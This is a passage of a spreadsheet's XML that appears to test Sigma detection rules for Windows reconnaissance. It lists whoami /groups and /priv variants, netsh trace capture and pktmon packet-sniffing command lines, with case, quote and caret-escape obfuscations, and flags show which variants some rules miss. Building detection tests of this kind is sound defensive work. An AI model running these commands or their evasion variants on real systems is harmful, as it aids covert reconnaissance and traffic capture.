      <c r="I654" s="36" t="n"/>
      <c r="J654" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K654" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="655" ht="15.75" customHeight="1" s="42">
      <c r="A655" s="43" t="n"/>
      <c r="B655" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C655" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D655" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E655" s="36" t="inlineStr">
        <is>
          <t>whoami "/groups"</t>
        </is>
      </c>
      <c r="F655" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G655" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H655" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I655" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J655" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K655" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="656" ht="15.75" customHeight="1" s="42">
      <c r="A656" s="43" t="n"/>
      <c r="B656" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C656" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D656" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E656" s="36" t="inlineStr">
        <is>
          <t>whoami "/groupS"</t>
        </is>
      </c>
      <c r="F656" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G656" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H656" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I656" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J656" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K656" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="657" ht="15.75" customHeight="1" s="42">
      <c r="A657" s="43" t="n"/>
      <c r="B657" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C657" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D657" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E657" s="36" t="inlineStr">
        <is>
          <t>whoami "/gROUPs"</t>
        </is>
      </c>
      <c r="F657" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G657" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H657" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I657" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J657" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K657" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="658" ht="15.75" customHeight="1" s="42">
      <c r="A658" s="43" t="n"/>
      <c r="B658" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C658" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D658" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E658" s="36" t="inlineStr">
        <is>
          <t>whoami "/groups""</t>
        </is>
      </c>
      <c r="F658" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G658" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H658" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I658" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J658" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K658" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="659" ht="15.75" customHeight="1" s="42">
      <c r="A659" s="43" t="n"/>
      <c r="B659" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C659" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D659" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E659" s="36" t="inlineStr">
        <is>
          <t>whoami "/gRoUpS"</t>
        </is>
      </c>
      <c r="F659" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G659" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H659" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I659" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J659" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K659" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="660" ht="15.75" customHeight="1" s="42">
      <c r="A660" s="43" t="n"/>
      <c r="B660" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C660" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D660" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E660" s="36" t="inlineStr">
        <is>
          <t>whoami "/priv"</t>
        </is>
      </c>
      <c r="F660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H660" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I660" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J660" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K660" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="661" ht="15.75" customHeight="1" s="42">
      <c r="A661" s="43" t="n"/>
      <c r="B661" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C661" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D661" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E661" s="36" t="inlineStr">
        <is>
          <t>whoami "/prIv"</t>
        </is>
      </c>
      <c r="F661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H661" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I661" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J661" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K661" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="662" ht="15.75" customHeight="1" s="42">
      <c r="A662" s="43" t="n"/>
      <c r="B662" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C662" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D662" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E662" s="36" t="inlineStr">
        <is>
          <t>whoami "/priV"</t>
        </is>
      </c>
      <c r="F662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H662" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I662" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J662" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K662" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="663" ht="15.75" customHeight="1" s="42">
      <c r="A663" s="43" t="n"/>
      <c r="B663" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C663" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D663" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E663" s="36" t="inlineStr">
        <is>
          <t>whoami "/PrIv"</t>
        </is>
      </c>
      <c r="F663" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G663" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H663" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I663" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J663" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K663" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="664" ht="15.75" customHeight="1" s="42">
      <c r="A664" s="43" t="n"/>
      <c r="B664" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C664" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D664" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E664" s="36" t="inlineStr">
        <is>
          <t>whoami "/pRiV"</t>
        </is>
      </c>
      <c r="F664" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G664" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H664" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I664" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J664" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K664" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="665" ht="15.75" customHeight="1" s="42">
      <c r="A665" s="43" t="n"/>
      <c r="B665" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C665" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D665" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E665" s="36" t="inlineStr">
        <is>
          <t>whoami "/PRIV"</t>
        </is>
      </c>
      <c r="F665" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G665" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H665" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I665" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J665" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K665" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="666" ht="15.75" customHeight="1" s="42">
      <c r="A666" s="43" t="n"/>
      <c r="B666" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C666" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D666" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E666" s="36" t="inlineStr">
        <is>
          <t>whoami "/PrIV"</t>
        </is>
      </c>
      <c r="F666" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G666" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H666" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I666" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J666" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K666" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="15.75" customHeight="1" s="42">
      <c r="A667" s="43" t="n"/>
      <c r="B667" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C667" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D667" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E667" s="36" t="inlineStr">
        <is>
          <t>whoami /p^rIv</t>
        </is>
      </c>
      <c r="F667" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G667" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H667" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I667" s="36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667" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K667" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="668" ht="15.75" customHeight="1" s="42">
      <c r="A668" s="43" t="n"/>
      <c r="B668" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C668" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D668" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E668" s="36" t="inlineStr">
        <is>
          <t>whoami /"p^riv"</t>
        </is>
      </c>
      <c r="F668" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G668" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H668" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I668" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J668" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K668" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="669" ht="15.75" customHeight="1" s="42">
      <c r="A669" s="43" t="n"/>
      <c r="B669" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C669" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D669" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E669" s="36" t="inlineStr">
        <is>
          <t>whoami /p^riV</t>
        </is>
      </c>
      <c r="F669" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G669" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H669" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I669" s="36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669" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K669" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="670" ht="15.75" customHeight="1" s="42">
      <c r="A670" s="43" t="n"/>
      <c r="B670" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C670" s="43" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D670" s="43" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E670" s="43" t="inlineStr">
        <is>
          <t>whoami /p^RIV</t>
        </is>
      </c>
      <c r="F670" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I670" s="43" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE (97a80ec7-0e2f-4d05-9ef4-65760e634f6b); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J670" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K670" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="671" ht="15.75" customHeight="1" s="42">
      <c r="A671" s="36" t="n"/>
      <c r="B671" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C671" s="36" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D671" s="36" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E671" s="36" t="inlineStr">
        <is>
          <t>whoami -"p^riv"</t>
        </is>
      </c>
      <c r="F671" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G671" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H671" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I671" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J671" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K671" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="672" ht="15.75" customHeight="1" s="42">
      <c r="A672" s="36" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B672" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C672" s="36" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D672" s="36" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E672" s="36" t="inlineStr">
        <is>
          <t>netsh tr st capture=yes</t>
        </is>
      </c>
      <c r="F672" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G672" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H672" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I672" s="36" t="n"/>
      <c r="J672" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K672" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="673" ht="15.75" customHeight="1" s="42">
      <c r="A673" s="36" t="n"/>
      <c r="B673" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C673" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D673" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E673" s="36" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics --trace</t>
        </is>
      </c>
      <c r="F673" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G673" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H673" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I673" s="36" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J673" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K673" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="15.75" customHeight="1" s="42">
      <c r="A674" s="43" t="n"/>
      <c r="B674" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C674" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D674" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E674" s="36" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" -"-comp" nics --trace</t>
        </is>
      </c>
      <c r="F674" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G674" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H674" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I674" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J674" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K674" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="15.75" customHeight="1" s="42">
      <c r="A675" s="43" t="n"/>
      <c r="B675" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C675" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D675" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E675" s="36" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" --comp nics --tRaCe</t>
        </is>
      </c>
      <c r="F675" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G675" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H675" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I675" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J675" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K675" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="676" ht="15.75" customHeight="1" s="42">
      <c r="A676" s="43" t="n"/>
      <c r="B676" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C676" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D676" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E676" s="36" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics -"-trace"</t>
        </is>
      </c>
      <c r="F676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H676" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I676" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J676" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K676" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="677" ht="15.75" customHeight="1" s="42">
      <c r="A677" s="43" t="n"/>
      <c r="B677" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C677" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D677" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E677" s="36" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" --comp nics /"-trace"</t>
        </is>
      </c>
      <c r="F677" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G677" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H677" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I677" s="36" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J677" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K677" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="678" ht="15.75" customHeight="1" s="42">
      <c r="A678" s="43" t="n"/>
      <c r="B678" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C678" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D678" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E678" s="36" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics --traCE</t>
        </is>
      </c>
      <c r="F678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H678" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I678" s="36" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J678" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K678" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="679" ht="15.75" customHeight="1" s="42">
      <c r="A679" s="43" t="n"/>
      <c r="B679" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C679" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D679" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E679" s="36" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" --comp nics --TrAcE</t>
        </is>
      </c>
      <c r="F679" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G679" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H679" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I679" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J679" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K679" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="680" ht="15.75" customHeight="1" s="42">
      <c r="A680" s="43" t="n"/>
      <c r="B680" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C680" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D680" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E680" s="36" t="inlineStr">
        <is>
          <t>pktmon start --capture --ComP nics --trace</t>
        </is>
      </c>
      <c r="F680" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G680" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H680" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I680" s="36" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J680" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K680" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="681" ht="15.75" customHeight="1" s="42">
      <c r="A681" s="43" t="n"/>
      <c r="B681" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C681" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D681" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E681" s="36" t="inlineStr">
        <is>
          <t>pktmon start --capture --coMp nics --trace</t>
        </is>
      </c>
      <c r="F681" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G681" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H681" s="36" t="b">
        <v>0</v>
      </c>
